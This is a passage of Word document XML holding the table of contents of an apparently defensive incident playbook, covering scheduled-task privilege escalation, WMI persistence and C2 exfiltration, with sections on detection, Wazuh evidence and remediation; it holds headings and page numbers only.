          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896681 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>7</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="3DA102CB" w14:textId="13BCEB97">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82">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896682 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>10</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="64F4F638" w14:textId="03BECF9B">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83">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896683 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>11</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="24969F55" w14:textId="0D4E8D97">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84">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control/Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896684 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>12</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="416B4351" w14:textId="5B886C64">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85">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896685 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>12</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="4B02402F" w14:textId="424530D7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896686">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #002 – Privileged Escalation via Insecure Scheduled Task Permissions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896686 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>13</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="30652909" w14:textId="19E41B0D">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87">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896687 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>13</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="33E40F91" w14:textId="7F96DA3A">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88">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896688 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>13</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="4F360A96" w14:textId="5C348B17">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89">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896689 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>15</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="6740FF52" w14:textId="419ADE27">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90">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896690 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>18</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="438FDD08" w14:textId="3282ADBC">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91">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control/Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896691 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>18</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="011F597F" w14:textId="43FF6118">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92">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896692 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>19</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="2AB90B98" w14:textId="304FB9CB">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896693">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #003 – Permanent WMI Event Subscription Persistence (Timer-based)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896693 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>21</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="17FE9160" w14:textId="339D8853">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94">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896694 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>21</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="1C1BD5F9" w14:textId="005BAE6F">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95">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896695 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>21</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="72EC753A" w14:textId="16596660">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96">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896696 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>22</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="745A2A5D" w14:textId="236337F3">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97">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>A) Host-based IOCs (WMI Persistence Footprint)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896697 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>22</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="421836C8" w14:textId="5C2BC39B">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98">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>B) Windows Event Logs (supporting evidence)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896698 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>23</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="35FA8062" w14:textId="7E3F0E0A">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699">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>C) SIEM / Wazuh (main detection evidence from our demo)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896699 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>23</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="661BEE64" w14:textId="353A0375">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700">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies (Containment, Eradication, Recovery)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896700 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>24</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="58955468" w14:textId="4F7C444B">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701">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Eradication (remove persistence properly)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896701 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>24</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="73D41110" w14:textId="6878C2BD">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702">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Recovery</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896702 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>24</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="299F999C" w14:textId="07A08960">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896703">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control / Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896703 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>24</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="6AD4C6D1" w14:textId="317FE7B7">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704">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896704 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>25</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="7FDC3543" w14:textId="14AEC424">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896705">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #004 – Exfiltration Over C2 Channel</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896705 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>26</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="3DF43690" w14:textId="200E36D0">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706">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896706 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>26</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="5CDE0974" w14:textId="71B6E7F0">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707">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896707 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>26</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="4D1D8A7F" w14:textId="692EF9A9">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708">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896708 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>27</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="0156FE6F" w14:textId="31D395DE">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709">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896709 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>28</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="016BA911" w14:textId="533047AD">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710">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control/Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896710 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>29</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000603BD" w:rsidRDefault="000603BD" w14:paraId="1A41A242" w14:textId="27FC7E39">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc220896711">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
          <w:fldChar w:fldCharType="begin"/>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896711 \h </w:instrText>
          <w:fldChar w:fldCharType="separate"/>
          <w:t>30</w:t>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1C075EAA" w:rsidP="1C075EAA" w:rsidRDefault="1C075EAA" w14:paraId="567ACF1F" w14:textId="62FA7BFA">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9180"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="004D5913" w:rsidP="004D5913" w:rsidRDefault="00CB4373" w14:paraId="553E02A5" w14:textId="4C068ACF">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:ind w:left="-709"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="6"/>
      <w:commentRangeEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="6"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="004D5913" w:rsidP="004D5913" w:rsidRDefault="004D5913" w14:paraId="46F85EB7" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:ind w:left="-709"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:kern w:val="28"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:i/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71233" w:rsidP="00E749F5" w:rsidRDefault="00E749F5" w14:paraId="4156661A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896677" w:id="7"/>
      <w:bookmarkStart w:name="_Toc36764272" w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Playbook TTP Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00FF756D" w:rsidP="00705FA1" w:rsidRDefault="00E71233" w14:paraId="2A97C232" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
